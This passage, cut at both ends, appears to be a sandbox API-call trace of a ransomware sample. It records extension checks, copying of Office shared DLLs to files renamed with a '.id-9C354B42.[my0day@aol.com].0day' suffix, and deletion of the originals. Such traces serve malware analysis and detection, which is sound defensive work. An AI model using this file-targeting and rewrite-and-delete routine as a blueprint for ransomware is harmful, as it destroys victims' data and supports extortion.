lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1 [0050.287] lstrlenW (lpString=".docx") returned 5 [0050.287] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1 [0050.287] lstrlenW (lpString=".pdf") returned 4 [0050.287] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1 [0050.287] lstrlenW (lpString=".xls") returned 4 [0050.287] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1 [0050.287] lstrlenW (lpString=".xlsx") returned 5 [0050.287] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1 [0050.287] lstrlenW (lpString=".ppt") returned 4 [0050.287] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1 [0050.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.287] lstrlenW (lpString=".zip") returned 4 [0050.287] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0050.287] lstrlenW (lpString=".rar") returned 4 [0050.287] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0050.287] lstrlenW (lpString=".bz2") returned 4 [0050.287] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1 [0050.287] lstrlenW (lpString=".7z") returned 3 [0050.287] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1 [0050.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.287] lstrlenW (lpString=".dbf") returned 4 [0050.287] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0050.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.287] lstrlenW (lpString=".1cd") returned 4 [0050.287] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1 [0050.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.287] lstrlenW (lpString=".jpg") returned 4 [0050.287] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1 [0050.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.287] lstrlenW (lpString=".doc") returned 4 [0050.287] lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1 [0050.287] lstrlenW (lpString=".docx") returned 5 [0050.287] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1 [0050.288] lstrlenW (lpString=".pdf") returned 4 [0050.288] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1 [0050.288] lstrlenW (lpString=".xls") returned 4 [0050.288] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1 [0050.288] lstrlenW (lpString=".xlsx") returned 5 [0050.288] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1 [0050.288] lstrlenW (lpString=".ppt") returned 4 [0050.288] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1 [0050.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.288] lstrlenW (lpString=".zip") returned 4 [0050.288] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0050.288] lstrlenW (lpString=".rar") returned 4 [0050.288] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0050.288] lstrlenW (lpString=".bz2") returned 4 [0050.288] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1 [0050.288] lstrlenW (lpString=".7z") returned 3 [0050.288] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1 [0050.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.288] lstrlenW (lpString=".dbf") returned 4 [0050.288] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0050.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.288] lstrlenW (lpString=".1cd") returned 4 [0050.288] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1 [0050.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0050.288] lstrlenW (lpString=".jpg") returned 4 [0050.288] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1 [0050.288] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0050.288] lstrlenW (lpString="MSOEURO.DLL") returned 11 [0050.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.289] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=31104) returned 1 [0050.289] CloseHandle (hObject=0x20c) returned 1 [0050.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 0x20 [0050.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.294] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.294] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0050.295] GetLastError () returned 0x0 [0050.295] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x7980, lpOverlapped=0x0) returned 1 [0050.298] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x7990, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x7990, lpOverlapped=0x0) returned 1 [0050.299] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.299] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0050.299] SetEndOfFile (hFile=0x198) returned 1 [0050.299] CloseHandle (hObject=0x198) returned 1 [0050.299] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.299] SetEndOfFile (hFile=0x20c) returned 1 [0050.300] CloseHandle (hObject=0x20c) returned 1 [0050.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0050.300] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 1 [0050.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.301] lstrlenW (lpString=".doc") returned 4 [0050.301] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0050.301] lstrlenW (lpString=".docx") returned 5 [0050.301] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0050.301] lstrlenW (lpString=".pdf") returned 4 [0050.301] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0050.301] lstrlenW (lpString=".xls") returned 4 [0050.301] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0050.301] lstrlenW (lpString=".xlsx") returned 5 [0050.301] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0050.301] lstrlenW (lpString=".ppt") returned 4 [0050.301] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0050.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.301] lstrlenW (lpString=".zip") returned 4 [0050.301] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0050.301] lstrlenW (lpString=".rar") returned 4 [0050.301] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0050.301] lstrlenW (lpString=".bz2") returned 4 [0050.301] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0050.301] lstrlenW (lpString=".7z") returned 3 [0050.301] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0050.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.301] lstrlenW (lpString=".dbf") returned 4 [0050.301] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0050.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.301] lstrlenW (lpString=".1cd") returned 4 [0050.301] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0050.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.301] lstrlenW (lpString=".jpg") returned 4 [0050.301] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0050.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.301] lstrlenW (lpString=".doc") returned 4 [0050.301] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0050.302] lstrlenW (lpString=".docx") returned 5 [0050.302] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0050.302] lstrlenW (lpString=".pdf") returned 4 [0050.302] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0050.302] lstrlenW (lpString=".xls") returned 4 [0050.302] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0050.302] lstrlenW (lpString=".xlsx") returned 5 [0050.302] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0050.302] lstrlenW (lpString=".ppt") returned 4 [0050.302] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0050.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.302] lstrlenW (lpString=".zip") returned 4 [0050.302] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0050.302] lstrlenW (lpString=".rar") returned 4 [0050.302] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0050.302] lstrlenW (lpString=".bz2") returned 4 [0050.302] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0050.302] lstrlenW (lpString=".7z") returned 3 [0050.302] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0050.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.302] lstrlenW (lpString=".dbf") returned 4 [0050.302] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0050.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.302] lstrlenW (lpString=".1cd") returned 4 [0050.302] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0050.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0050.302] lstrlenW (lpString=".jpg") returned 4 [0050.302] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0050.302] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0050.302] lstrlenW (lpString="msgfilt.dll") returned 11 [0050.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0050.351] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=38768) returned 1 [0050.351] CloseHandle (hObject=0x190) returned 1 [0050.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 0x20 [0050.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0050.352] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.352] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0050.390] GetLastError () returned 0x0 [0050.390] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x9770, lpOverlapped=0x0) returned 1 [0050.392] WriteFile (in: hFile=0x224, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x9780, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x9780, lpOverlapped=0x0) returned 1 [0050.393] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.393] WriteFile (in: hFile=0x224, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0050.393] SetEndOfFile (hFile=0x224) returned 1 [0050.393] CloseHandle (hObject=0x224) returned 1 [0050.394] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.394] SetEndOfFile (hFile=0x190) returned 1 [0050.394] CloseHandle (hObject=0x190) returned 1 [0050.395] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0050.395] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 1 [0050.395] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.395] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.395] lstrlenW (lpString=".doc") returned 4 [0050.395] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.395] lstrlenW (lpString=".docx") returned 5 [0050.395] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0050.395] lstrlenW (lpString=".pdf") returned 4 [0050.395] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.395] lstrlenW (lpString=".xls") returned 4 [0050.395] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.395] lstrlenW (lpString=".xlsx") returned 5 [0050.395] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0050.395] lstrlenW (lpString=".ppt") returned 4 [0050.395] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.395] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.395] lstrlenW (lpString=".zip") returned 4 [0050.395] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.395] lstrlenW (lpString=".rar") returned 4 [0050.395] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.395] lstrlenW (lpString=".bz2") returned 4 [0050.396] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.396] lstrlenW (lpString=".7z") returned 3 [0050.396] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.396] lstrlenW (lpString=".dbf") returned 4 [0050.396] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.396] lstrlenW (lpString=".1cd") returned 4 [0050.396] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.396] lstrlenW (lpString=".jpg") returned 4 [0050.396] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.396] lstrlenW (lpString=".doc") returned 4 [0050.396] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.396] lstrlenW (lpString=".docx") returned 5 [0050.396] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0050.396] lstrlenW (lpString=".pdf") returned 4 [0050.396] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.396] lstrlenW (lpString=".xls") returned 4 [0050.396] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.396] lstrlenW (lpString=".xlsx") returned 5 [0050.396] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0050.396] lstrlenW (lpString=".ppt") returned 4 [0050.396] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.396] lstrlenW (lpString=".zip") returned 4 [0050.396] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.396] lstrlenW (lpString=".rar") returned 4 [0050.396] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.396] lstrlenW (lpString=".bz2") returned 4 [0050.396] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.396] lstrlenW (lpString=".7z") returned 3 [0050.396] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.397] lstrlenW (lpString=".dbf") returned 4 [0050.397] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.397] lstrlenW (lpString=".1cd") returned 4 [0050.397] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0050.397] lstrlenW (lpString=".jpg") returned 4 [0050.397] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.397] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0050.397] lstrlenW (lpString="odffilt.dll") returned 11 [0050.397] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0050.398] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=1312656) returned 1 [0050.398] CloseHandle (hObject=0x190) returned 1 [0050.398] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 0x20 [0050.398] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.398] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0050.398] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.398] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.398] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0050.399] GetLastError () returned 0x0 [0050.399] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0050.422] WriteFile (in: hFile=0x224, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0050.576] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x407a0, lpOverlapped=0x0) returned 1 [0050.586] WriteFile (in: hFile=0x224, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x407b0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x407b0, lpOverlapped=0x0) returned 1 [0050.593] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.593] WriteFile (in: hFile=0x224, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0050.593] SetEndOfFile (hFile=0x224) returned 1 [0050.593] CloseHandle (hObject=0x224) returned 1 [0050.594] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.594] SetEndOfFile (hFile=0x190) returned 1 [0050.596] CloseHandle (hObject=0x190) returned 1 [0050.596] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0050.596] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 1 [0050.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.597] lstrlenW (lpString=".doc") returned 4 [0050.597] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.597] lstrlenW (lpString=".docx") returned 5 [0050.597] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0050.597] lstrlenW (lpString=".pdf") returned 4 [0050.597] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.597] lstrlenW (lpString=".xls") returned 4 [0050.597] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.597] lstrlenW (lpString=".xlsx") returned 5 [0050.597] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0050.597] lstrlenW (lpString=".ppt") returned 4 [0050.597] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.597] lstrlenW (lpString=".zip") returned 4 [0050.597] 